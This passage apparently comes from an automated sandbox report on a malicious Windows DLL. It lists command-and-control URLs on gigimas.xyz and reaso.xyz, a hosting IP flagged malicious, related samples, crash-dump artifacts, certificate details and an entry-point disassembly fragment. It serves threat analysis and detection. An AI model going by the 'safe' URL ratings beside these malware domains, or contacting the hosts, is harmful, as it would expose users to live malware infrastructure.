            https://gigimas.xyzloaddll64.exe, 00000000.00000003.402271914.0000027ED3940000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.388635168.0000000002100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.826743463.0000021DDAD90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.826725063.0000021DDAC4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.388322445.000001F71CC60000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            https://gigimas.xyz/index.html)I6rundll32.exe, 00000004.00000003.759039619.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.759733313.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.694516726.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.629091178.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.693778417.0000021DD923C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://sectigo.com/CPS0pzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0pzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            http://ocsp.sectigo.com0pzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            https://gigimas.xyz/92rundll32.exe, 00000004.00000003.432267293.0000021DD9200000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://gigimas.xyz/index.htmlrrundll32.exe, 00000004.00000003.497300012.0000021DD9221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497398978.0000021DD9226000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://gigimas.xyz/icrundll32.exe, 00000004.00000002.825050387.0000021DD91F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://gigimas.xyz/index.htmluHrundll32.exe, 00000004.00000003.432113341.0000021DD9221000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://http://Mozilla/5.0loaddll64.exe, 00000000.00000003.402277727.0000027ED3942000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.388644042.0000000002102000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.826756799.0000021DDAD92000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.388329786.000001F71CC62000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#pzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            https://gigimas.xyz/index.htmlrundll32.exe, 00000004.00000003.563913643.0000021DD9221000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#pzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            https://gigimas.xyzhttps://reaso.xyzrundll32.exe, 00000004.00000002.826725063.0000021DDAC4D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#pzG0rkIchr.dllfalse
            • URL Reputation: safe
            unknown
            https://gigimas.xyz/index.htmllrundll32.exe, 00000004.00000003.563913643.0000021DD9221000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://gigimas.xyz/rundll32.exe, 00000004.00000002.825050387.0000021DD91F4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.758857404.0000021DD9255000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.758869560.0000021DD925F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.693664493.0000021DD925F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://reaso.xyzrundll32.exe, 00000004.00000002.826725063.0000021DDAC4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.388322445.000001F71CC60000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            https://gigimas.xyz:443/index.htmlrundll32.exe, 00000004.00000002.825032098.0000021DD91ED000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.825050387.0000021DD91F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.250.148.35
            gigimas.xyzRussian Federation
            48430FIRSTDC-ASRUtrue
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:752975
            Start date and time:2022-11-24 05:18:08 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 27s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:pzG0rkIchr.exe (renamed file extension from exe to dll)
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:20
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal84.troj.evad.winDLL@22/8@7/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 68.3% (good quality ratio 59.4%)
            • Quality average: 56.9%
            • Quality standard deviation: 33.4%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 89
            • Number of non-executed functions: 104
            Cookbook Comments:
            • Override analysis time to 240s for rundll32
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.182.143.212
            • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • VT rate limit hit for: pzG0rkIchr.dll
            TimeTypeDescription
            05:19:48API Interceptor1x Sleep call for process: loaddll64.exe modified
            05:19:49API Interceptor2x Sleep call for process: WerFault.exe modified
            05:20:02API Interceptor6x Sleep call for process: rundll32.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            185.250.148.35R1yf6aNGRb.dllGet hashmaliciousBrowse
              4R5qvHtzCd.dllGet hashmaliciousBrowse
                5120184.dllGet hashmaliciousBrowse
                  5130000.dllGet hashmaliciousBrowse
                    Shrjdjykdhjt.dllGet hashmaliciousBrowse
                      Shrjdjykdhjt.dllGet hashmaliciousBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        gigimas.xyzR1yf6aNGRb.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        4R5qvHtzCd.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        5120184.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        5130000.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        Shrjdjykdhjt.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        Shrjdjykdhjt.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        FIRSTDC-ASRUR1yf6aNGRb.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        4R5qvHtzCd.dllGet hashmaliciousBrowse
                        • 185.250.148.35
                        Setup.exeGet hashmaliciousBrowse
                        • 185.231.205.200
                        Cracked.exeGet hashmaliciousBrowse
                        • 185.231.205.200
                        file.exeGet hashmaliciousBrowse
                        • 45.67.35.17
                        5mpQrt0teP.exeGet hashmaliciousBrowse
                        • 93.185.166.95
                        vZu7WohZKt.exeGet hashmaliciousBrowse
                        • 93.185.166.200
                        vZu7WohZKt.exeGet hashmaliciousBrowse
                        • 93.185.166.200
                        221019-nwad3afdb7_pw_infected.zipGet hashmaliciousBrowse
                        • 5.252.23.34
                        hibUp3UOKx.exeGet hashmaliciousBrowse
                        • 45.67.35.251
                        kiFWEWjTPk.exeGet hashmaliciousBrowse
                        • 37.44.208.80
                        xx.dllGet hashmaliciousBrowse
                        • 45.67.34.245
                        xx.dllGet hashmaliciousBrowse
                        • 45.67.34.245
                        QfeGQnP2s8.exeGet hashmaliciousBrowse
                        • 185.250.149.159
                        cXRM6Pj5DY.exeGet hashmaliciousBrowse
                        • 5.252.23.112
                        AB2B84A49E97AC78BE55918EB9B1E91A69FC237BCD212.exeGet hashmaliciousBrowse
                        • 5.252.23.112
                        uMnMJBruGy.exeGet hashmaliciousBrowse
                        • 93.185.166.66
                        NbG0Dd9VYJ.exeGet hashmaliciousBrowse
                        • 93.185.166.66
                        VPLxcOSD74.exeGet hashmaliciousBrowse
                        • 93.185.166.66
                        2.exeGet hashmaliciousBrowse
                        • 193.43.146.213
                        No context
                        No context
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7600039551007107
                        Encrypted:false
                        SSDEEP:96:6TFZZFigJPnyqjs55P7HfipXIQcQHc6CcEm6cw3I/XaXz+HbHgSQgJPbpIDV9wO7:snigJKKH5Gs60j0I/u7swS274ltC
                        MD5:BD5C8925F7120E1292DBD4961E9F2AB2
                        SHA1:997623AC245EEC6535D175E199A180D43E9282FC
                        SHA-256:0B242B11BC21F42FD27F1BDD633316DA3694606201E59C3C3CCC3593345C8B7A
                        SHA-512:8075C625810E044C3224941D33DD97830E1EC5397E416AFC0DCCCB749580837F7629D7DDDCD531D39423195F82DCF2DF3060474F749789A977EF7DB655E65581
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.3.7.3.7.1.8.4.9.4.9.5.4.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.3.7.3.7.1.8.6.9.4.9.5.2.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.8.6.8.a.2.1.-.d.3.3.a.-.4.6.6.6.-.b.2.e.f.-.6.8.2.8.6.b.5.0.0.f.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.0.2.5.9.3.b.-.0.7.1.f.-.4.6.8.2.-.a.3.3.f.-.9.f.6.a.a.8.a.a.a.e.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.p.z.G.0.r.k.I.c.h.r...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.f.-.3.5.4.2.-.0.2.e.4.b.b.f.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7599992295897045
                        Encrypted:false
                        SSDEEP:96:icFXVFiXJPnybjs55P7Hf5pXIQcQdc6/RcEccw3+XaXz+HbHgSQgJPbpIDV9wOyk:71iXJKIHz9mAj0I/u7swS274ltC
                        MD5:1E8445DB848C561B6CB8CBEF60359786
                        SHA1:00E829DA03ACB0B24004E2C2E45E7D439352BF8D
                        SHA-256:8F94F06BC63F693379833D7156EC4C3E65788BD94BC7470C12EF985AED723EBD
                        SHA-512:72C3DE3F22801E3947FDC86690B8A63175DC9EFCF7503AF898485A380B6941C42E55F965658B3F799051283C10C4823F5C0C2DE8EFE293C9904D117487FDA1D2
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.3.7.3.7.1.8.5.0.8.6.8.0.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.3.7.3.7.1.8.7.2.8.9.9.3.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.1.b.0.7.4.e.-.3.1.b.5.-.4.4.2.6.-.9.9.a.5.-.9.9.5.d.d.3.d.8.4.c.8.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.5.1.b.f.8.e.-.f.c.a.f.-.4.9.c.0.-.9.1.b.f.-.f.7.b.f.3.9.f.f.a.0.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.p.z.G.0.r.k.I.c.h.r...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.1.c.-.0.0.0.1.-.0.0.1.f.-.8.9.9.5.-.c.1.e.6.b.b.f.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Nov 24 04:19:45 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):56070
                        Entropy (8bit):1.7075050210528775
                        Encrypted:false
                        SSDEEP:192:rlRq3OC5I6Pdfek5ka0LGuO3bcmXJBjz2RdYnUQDfERORDNKyB4RSOnR:pCDck5DbRD
                        MD5:1A5AA058B4E8ACA002D6B153E7C3B88E
                        SHA1:B722FD3B879CCAD5D57716D5D375355C05AC1AA4
                        SHA-256:4C914A886A7765E4A814BD13405293A39423A4BB8A6EE712B7D48B0E3086A3F9
                        SHA-512:010E25A468C02F293CEBCAF7FA64CF746F6716571837CAD3BC35877EC74F8808B352E2DBC3CE080FF502E1CE8ED8EF02F69F4953C48FFC0537CC6363A68EA782
                        Malicious:false
                        Preview:MDMP....... .........~c.........................................)..........T.......8...........T...............&...........T...........@....................................................................U...........B..............Lw................,nq...T.......4.....~c.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Nov 24 04:19:46 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):54966
                        Entropy (8bit):1.7301605700636602
                        Encrypted:false
                        SSDEEP:192:kl9crsOC5We/Q7NLbBjD4z5s0mE6liAU3Oq:amC8e/Q7d1V0m
                        MD5:A57C13F28721473003BE444D7239D372
                        SHA1:10C6496461E1C6113B6FF62120CA7D83CC17216A
                        SHA-256:EBF7FC039C185490580CF4BB3044B63044A13DD5305F7755AC858779DDFCD9FA
                        SHA-512:814B8BD3E2333F3084A46553787236EE0C5C0B71EA62B6636836254D80939B593CC3AE58EABC8CD3DDAE9620CAC53AF5550504734A192F8BADBE8BA98EEA582A
                        Malicious:false
                        Preview:MDMP....... .........~c.........................................)..........T.......8...........T...........................T...........@....................................................................U...........B..............Lw.....................T.............~c.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):3.696693878810589
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNiWpWiN6Y+TagmfQYSl2G+prD89b4oCafaIm:RrlsNiYWiN6YKagmfQYSlR4FafE
                        MD5:891C13F961FC9780F58F08B88D03FE00
                        SHA1:7AC38531C1F3F85ED591B419A1C0C9D560DE4B1B
                        SHA-256:B04D603146FD1D2F17D6588066AA48A86D85B511E7D88380393C69F9BCC4575C
                        SHA-512:3D766FCF4F2835FD6750E5BED7331A27EF548BB8C9D729E7B3D3AD8AA09677360AE67F5F2887B1D8057FEBFC622505A4A179A2F07B31E87FBDCEFD4B42C2B477
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8524
                        Entropy (8bit):3.6955697518324317
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNivSLis6Y+ZagmfQhSGG+pr889b4IOfxIm:RrlsNiqLis6YgagmfQhSM4Zfr
                        MD5:64CB5AA88613858B4078E5BB14479AE6
                        SHA1:138C49AF256A227F26D86557778AADF52F016EFB
                        SHA-256:1001101306104ACE07059DB78333327804781A7FBC4E59CBC7DEB3AC14A27E8E
                        SHA-512:32B368E68F5C667FE75F2B36BECB8680A2D39960E69878D527CAC83B1356126C7BFA04C9645E17A0ACCC7482F244DC7A5571186F0B5F7371D39FF7579A2F5F69
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.0.8.<./.P.i.d.>.......
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4733
                        Entropy (8bit):4.474599386008591
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsA+JgtBI9XlVWgc8sqYjRTq8fm8M4JCXCOFFVyq85m27UZESC5S+d:uITf3NGgrsqYlTfJ8xVv+d
                        MD5:CDE8A3EB67D3F603A55F6BCA1C15EA67
                        SHA1:9425363A7B60C24BB7466FEAA6C38D60B86C084D
                        SHA-256:F2E7CAB0595409E2A61035A46D0DF145C3CCCDC99C2FE8FDB7BBF04B590ED7F9
                        SHA-512:BC28D09B0C638843187EDB12E207B49C15A1F99917950FC5E748FEC26F62376E8AFDA47C3BBBEDB80F52FC38BF4C8FE02AA0232816274B4B291A576CD030FACC
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1793610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        Process:C:\Windows\System32\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4733
                        Entropy (8bit):4.478085829501657
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zsA+JgtBI9XlVWgc8sqYjF8fm8M4JCXCOCFUyq85m2skUZESC5Sjd:uITf3NGgrsqYeJuzTVvjd
                        MD5:0BD2A0E70F01F1D342661314591029DC
                        SHA1:CFA327EBD0E02AEAA2F23AB3EA938AA843FB71F5
                        SHA-256:A8350E49452A0A6A302EF0A3BA63447E4F1C64FF6C2335E22D1B53DE654A27D5
                        SHA-512:6CA8CB1FA55453B637117B22CC0C474110CFE03BCFD602657AEE4F778B4072F8623D5CF32193183DF148F8A5630996B0926C499700F663552898C875774CD12A
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1793610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Entropy (8bit):6.637392883592079
                        TrID:
                        • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                        • Win64 Executable (generic) (12005/4) 10.17%
                        • Generic Win/DOS Executable (2004/3) 1.70%
                        • DOS Executable Generic (2002/1) 1.70%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                        File name:pzG0rkIchr.dll
                        File size:290568
                        MD5:d6ef4778f7dc9c31a0a2a989ef42d2fd
                        SHA1:5dad8394ef37d5a006674589754f7a3187d303b1
                        SHA256:54de1f2c26a63a8f6b7f8d5de99f8ebd4093959ab07f027db1985d0652258736
                        SHA512:997b57424364ff661d80ca6efc5b7e91f2204d1ed7c4d784ee7d6134bc06952c993de038d6a25c71a7949b08ddd8cc5d167f8c753379f69ee1b6b49342fafa63
                        SSDEEP:6144:wHyvumb1p7CC8VoxOJbceNOHI2Tse2RTggR/Znv+yit:Smbrgu2so2TVwcK/ZnG/t
                        TLSH:ED54BF41F3D904A6D9138D3D8857562BEBF13C212214DA5F8B50C36A6F37BA1E739B22
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!5..eT..eT..eT....Z.`T....X..T....Y.hT..^...bT..^...qT..^...uT....`.fT..eT...T......gT......dT......dT..RicheT..........PE..d..
                        Icon Hash:74f0e4ecccdce0e4
                        Entrypoint:0x18000b6ec
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x180000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x62C42DD7 [Tue Jul 5 12:25:59 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:4270d9bbb54b179372d82277269282e6
                        Signature Valid:true
                        Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                        Signature Validation Error:The operation completed successfully
                        Error Number:0
                        Not Before, Not After
                        • 7/6/2021 2:00:00 AM 7/7/2022 1:59:59 AM
                        Subject Chain
                        • CN=NAILS UNLIMITED LIMITED, O=NAILS UNLIMITED LIMITED, L=DORCHESTER, S=Dorset, C=GB
                        Version:3
                        Thumbprint MD5:71834A68FD130C9D08796B4F19A6FC67
                        Thumbprint SHA-1:CA69087AAAA087346202AD16228337130511C4C5
                        Thumbprint SHA-256:F13E4801E13898E839183E3305E1DDA7F4C0EBF6EAF7553E18C1DDD4EDC94470
                        Serial:2F96A89BFEC6E44DD224E8FD7E72D9BB
                        Instruction
                        dec eax
                        mov dword ptr [esp+08h], ebx
                        dec eax
                        mov dword ptr [esp+10h], esi
                        push edi
                        dec eax
                        sub esp, 20h
                        dec ecx
                        mov edi, eax
                        mov ebx, edx
                        dec eax
                        mov esi, ecx
                        cmp edx, 01h
                        jne 00007FE818B824F7h
                        call 00007FE818B828F0h
                        dec esp
                        mov eax, edi
                        mov edx, ebx
                        dec eax
                        mov ecx, esi
                        dec eax
